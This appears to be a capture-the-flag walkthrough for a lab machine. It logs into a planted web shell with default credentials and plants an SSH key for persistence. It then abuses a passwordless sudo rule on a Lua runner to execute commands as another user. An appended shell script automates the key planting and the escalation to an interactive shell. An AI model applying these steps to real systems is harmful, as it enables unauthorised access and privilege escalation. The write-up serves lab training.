Web Shell Exploitation

Heading over to 10.10.10.181/smevk.php we are prompted for a login. Checking the smevk.php file we downloaded earlier, the default credentials are admin:admin. Entering them gives us backdoor access to the server through the web shell.

Exploring the system we find that we can write to /home/webadmin/.ssh/. That being the case, we can add our own public SSH key to authorized_keys and get ourselves a proper shell over SSH instead of working through the web shell. One thing to check: sshd (with its default StrictModes) ignores authorized_keys if the .ssh directory or the file itself is group- or world-writable, so the directory should be 700 and the file 600.

Now we can SSH into the server as webadmin. Doing so, we are greeted with a message of the day.

First things first, we run sudo -l to see what we are allowed to run with sudo (and any restrictions on it).
We find that we may run /home/sysadmin/luvit as user sysadmin with no password required.

Listing the current directory, we also find a note. Reading it, we learn that /home/sysadmin/luvit is used to test Lua files. Since we can run it as sysadmin, any Lua we hand it executes as that user. Great, this is our route to user.

We create a file called kss.lua containing:

os.execute("cat /home/sysadmin/user.txt")

and then execute it by running:

sudo -u sysadmin /home/sysadmin/luvit kss.lua

This prints the user flag, so we have user access. Note that os.execute hands its argument to /bin/sh, so the same payload can just as well spawn a full shell as sysadmin rather than only reading one file.
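The two steps above (installing our key for webadmin, then abusing the sudo rule on luvit) as an added POSIX sh example; this is not code from the original writeup. The target paths /home/webadmin/.ssh and /home/sysadmin/luvit are the ones from the box; the key file path, the payload path /tmp/kss.lua, the RUN_PE switch and the function names are assumptions for illustration. The key installer sets the permissions sshd requires and is idempotent, and the escalation runs only if sudo -l actually lists the luvit rule.

```shell
#!/bin/sh
# Added example, not part of the original writeup. Assumed: key file path,
# payload path, RUN_PE switch. Target paths come from the writeup.

# Append a public key to authorized_keys exactly once, with the permissions
# sshd's StrictModes expects (.ssh 700, authorized_keys 600). A key dropped
# in with lax permissions is silently ignored by sshd.
install_pubkey() {
    pubkey="$1"
    sshdir="$2"
    mkdir -p "$sshdir"
    chmod 700 "$sshdir"
    touch "$sshdir/authorized_keys"
    # -x: whole-line match, -F: fixed string (key material is not a regex)
    if ! grep -qxF "$pubkey" "$sshdir/authorized_keys"; then
        printf '%s\n' "$pubkey" >> "$sshdir/authorized_keys"
    fi
    chmod 600 "$sshdir/authorized_keys"
}

# Write a Lua payload for luvit. The command is placed in a Lua long string
# [[ ... ]] so quotes inside it need no escaping (it must not contain "]]").
write_luvit_payload() {
    lua_path="$1"
    cmd="$2"
    printf 'os.execute([[%s]])\n' "$cmd" > "$lua_path"
}

# True only if sudo -l lists the luvit binary for the current user.
luvit_rule_present() {
    sudo -n -l 2>/dev/null | grep -q '/home/sysadmin/luvit'
}

# Write the payload and run it through luvit as sysadmin.
run_as_sysadmin() {
    lua_path="$1"
    cmd="$2"
    write_luvit_payload "$lua_path" "$cmd"
    luvit_rule_present || { echo "no sudo rule for /home/sysadmin/luvit" >&2; return 1; }
    sudo -u sysadmin /home/sysadmin/luvit "$lua_path"
}

# Stand-alone use on the box (assumed key path); set RUN_PE=1 to execute.
if [ "${RUN_PE:-0}" = 1 ]; then
    install_pubkey "$(cat "$HOME/id_ed25519.pub")" /home/webadmin/.ssh
    # A shell rather than a single cat: os.execute runs it via /bin/sh as sysadmin.
    run_as_sysadmin /tmp/kss.lua '/bin/bash -i'
fi
```

On the box you would run the key install from the web shell (as webadmin), log in over SSH, and then call the escalation; with RUN_PE unset the script only defines the functions, so it can be sourced and the pieces used individually.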